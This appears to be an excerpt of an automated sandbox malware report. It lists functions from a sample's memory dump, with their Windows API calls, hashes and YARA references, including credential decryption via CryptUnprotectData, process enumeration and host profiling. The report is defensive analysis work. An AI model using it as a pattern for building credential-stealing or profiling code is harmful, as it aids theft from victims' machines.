                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: 059111ac4ed2e3c77d6eac9774721a53a064262ae44f2cce2fac85dabd2a389e
                                    • Instruction ID: 3537e1ac6b1d34c3aa0ad184527e024df6603030b08de6e60c93b2a2071643d7
                                    • Opcode Fuzzy Hash: 059111ac4ed2e3c77d6eac9774721a53a064262ae44f2cce2fac85dabd2a389e
                                    • Instruction Fuzzy Hash: A3414F75D0421EDBDB10CFA4DD89BEEB7B8AB48704F1041B8E509A7280E7B45A84CF95
                                    Function 001972A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 001972AD
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001972B4
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001972E1
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00197304
                                    • LocalFree.KERNEL32(?), ref: 0019730E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: c88eeebd312f92c477a7a8f4db430498d3e3190a847d91e92c73322feb2bc2fa
                                    • Instruction ID: 61cdc9c44a0582371dbde64c8dc55cf72fee4a94536ab7a30694df836a65eb04
                                    • Opcode Fuzzy Hash: c88eeebd312f92c477a7a8f4db430498d3e3190a847d91e92c73322feb2bc2fa
                                    • Instruction Fuzzy Hash: A3014CB5A44308BBDB10DFE4DC46F9E7778BB44B04F104154FB05AA2C0D7B0AA008B69
                                    Function 001A9790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001A97AE
                                    • Process32First.KERNEL32(001B0ACE,00000128), ref: 001A97C2
                                    • Process32Next.KERNEL32(001B0ACE,00000128), ref: 001A97D7
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 001A97EC
                                    • CloseHandle.KERNEL32(001B0ACE), ref: 001A980A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 5a209397a035b07538d0261cf3410b720609328a4b994c7956029c181798fc0c
                                    • Instruction ID: 0ec8b6870d49ca23866b53daf06891fe9b963f8f5cd9613bc10b5858798b6b28
                                    • Opcode Fuzzy Hash: 5a209397a035b07538d0261cf3410b720609328a4b994c7956029c181798fc0c
                                    • Instruction Fuzzy Hash: D3011E79A14208EBDB24DFA4CD54BEDB7B8BB09704F1045D9E50997240EB749B84CF51
                                    Function 001B4573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <7\h$huzx
                                    • API String ID: 0-2989614873
                                    • Opcode ID: aefaf097f79d00f3cb7cc583a99de9ca3f86213f6f2ab66147132978ee289807
                                    • Instruction ID: 07d9a902ebf7ac664371371c9fff62d722c299931c202a3402b29cff31fc5490
                                    • Opcode Fuzzy Hash: aefaf097f79d00f3cb7cc583a99de9ca3f86213f6f2ab66147132978ee289807
                                    • Instruction Fuzzy Hash: 2E63323241EBD41ECB27DB3087B62E17F66BA2361031D49CEC9C18B5B3C7949A16E356
                                    Function 005F7AEE Relevance: 6.6, Strings: 4, Instructions: 1619COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #A\{$&n:W$Fd5?$K/
                                    • API String ID: 0-1382967124
                                    • Opcode ID: 3dee8bf7763b5892e5a0e1adf3c1fafc29a8a235491a3af2a75614fb65871241
                                    • Instruction ID: ca2fbca6128fb5187198016345a42e40710f146828a1b37af8a5bb84cb8bff39
                                    • Opcode Fuzzy Hash: 3dee8bf7763b5892e5a0e1adf3c1fafc29a8a235491a3af2a75614fb65871241
                                    • Instruction Fuzzy Hash: 85B247F360C200AFE7046E29EC8567EFBE9EF94720F1A493DE6C4C7744EA3558458692
                                    Function 005F5FDB Relevance: 6.6, Strings: 4, Instructions: 1595COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 4bMU$YMy$j4 $q{y5
                                    • API String ID: 0-3216817245
                                    • Opcode ID: 908d59bedfbabbdd7a6e4bcda54c1c862e9ab610056ae1161f59567fecf2b659
                                    • Instruction ID: 3363f92f0b4d267563073a2fe651bb904fb27c0a3b93d7f9f4aeccf07431bbc3
                                    • Opcode Fuzzy Hash: 908d59bedfbabbdd7a6e4bcda54c1c862e9ab610056ae1161f59567fecf2b659
                                    • Instruction Fuzzy Hash: 20B219F3A0C2049FE304AE2DDC8567ABBE9EF94320F1A892DE6C5C3744E63558418797
                                    Function 001A9030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,001951D4,40000001,00000000,00000000,?,001951D4), ref: 001A9050
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: 0be03f40dd4c6eec1d2e6f200770472a5acfcce404cd44aa917cd26b15e25c0d
                                    • Instruction ID: 6e0a6da7ee71a6d8e6642dcc9c0762ce956ffe40ece720b7f81bc910fa356181
                                    • Opcode Fuzzy Hash: 0be03f40dd4c6eec1d2e6f200770472a5acfcce404cd44aa917cd26b15e25c0d
                                    • Instruction Fuzzy Hash: 25110678204208FFDF04CF64D984FAB33ADAF8A354F108558FA198B250DB71E9818BA5
                                    Function 0019A210 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00194F3E,00000000,00000000), ref: 0019A23F
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00194F3E,00000000,?), ref: 0019A251
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00194F3E,00000000,00000000), ref: 0019A27A
                                    • LocalFree.KERNEL32(?,?,?,?,00194F3E,00000000,?), ref: 0019A28F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: 2eb1a4d34d785d3b5d910b8fc8c3988d9b9f55742db9a0b9f52bb06afe87aefc
                                    • Instruction ID: b9b893a18662118e7e982694c63169c3fc5ff51fe12cead4c55f3a82795f7cef
                                    • Opcode Fuzzy Hash: 2eb1a4d34d785d3b5d910b8fc8c3988d9b9f55742db9a0b9f52bb06afe87aefc
                                    • Instruction Fuzzy Hash: 5A11D474240308AFEB10CF64CC95FAA77B5EB88B04F208498FD159B390C7B2A941CB94
                                    Function 001A7B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001B0DE8,00000000,?), ref: 001A7B40
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A7B47
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,001B0DE8,00000000,?), ref: 001A7B54
                                    • wsprintfA.USER32 ref: 001A7B83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 288b3a1b9edfdfa8759ba8935b8f2dc55e0b634da56999cff8d42b45617438f1
                                    • Instruction ID: f939895362301f9d7c03ecc0c0a09e83bc37589dc4b2a97fd25bb5f291df4f52
                                    • Opcode Fuzzy Hash: 288b3a1b9edfdfa8759ba8935b8f2dc55e0b634da56999cff8d42b45617438f1
                                    • Instruction Fuzzy Hash: BB113CB2908119ABCB14DFC9DD45BBFB7B8FB4CB15F10425AF605A2280E3795940C7B5
                                    Function 001A7BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E2E398,00000000,?,001B0DF8,00000000,?,00000000,00000000), ref: 001A7BF3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A7BFA
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E2E398,00000000,?,001B0DF8,00000000,?,00000000,00000000,?), ref: 001A7C0D
                                    • wsprintfA.USER32 ref: 001A7C47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 3a369ccb0586363111f1de58ee45fc335d1700aed0f02a43db68a2765c39887a
                                    • Instruction ID: 2b5002ba5ad51d4af63e143062ee82429744d94d23e50c8d5fc54ce645ee832d
                                    • Opcode Fuzzy Hash: 3a369ccb0586363111f1de58ee45fc335d1700aed0f02a43db68a2765c39887a
                                    • Instruction Fuzzy Hash: 8311E1B4A09219EBEB208B54DC45FA9BB78FB05720F0043E5F60A932C0E7741A408B51
                                    Function 005F2BEB Relevance: 5.3, Strings: 3, Instructions: 1545COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +u7$1Sc$qG3
                                    • API String ID: 0-552559428
                                    • Opcode ID: 9f324aa120f4d92e7312344b56c49b9423817167b700a9148187bfd34418d3a0
                                    • Instruction ID: 75e8ae5f13038a05a6fd943e3f12a2efdb1c527f01257018e3d116ff790d3734
                                    • Opcode Fuzzy Hash: 9f324aa120f4d92e7312344b56c49b9423817167b700a9148187bfd34418d3a0
                                    • Instruction Fuzzy Hash: DCB2F4F3A082049FE704AE29EC9567AFBE9EF94720F16492DEAC4C7340E67558018797
                                    Function 001A3970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(001AE120,00000000,00000001,001AE110,00000000), ref: 001A39A8
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001A3A00
                                    Memory Dump Source
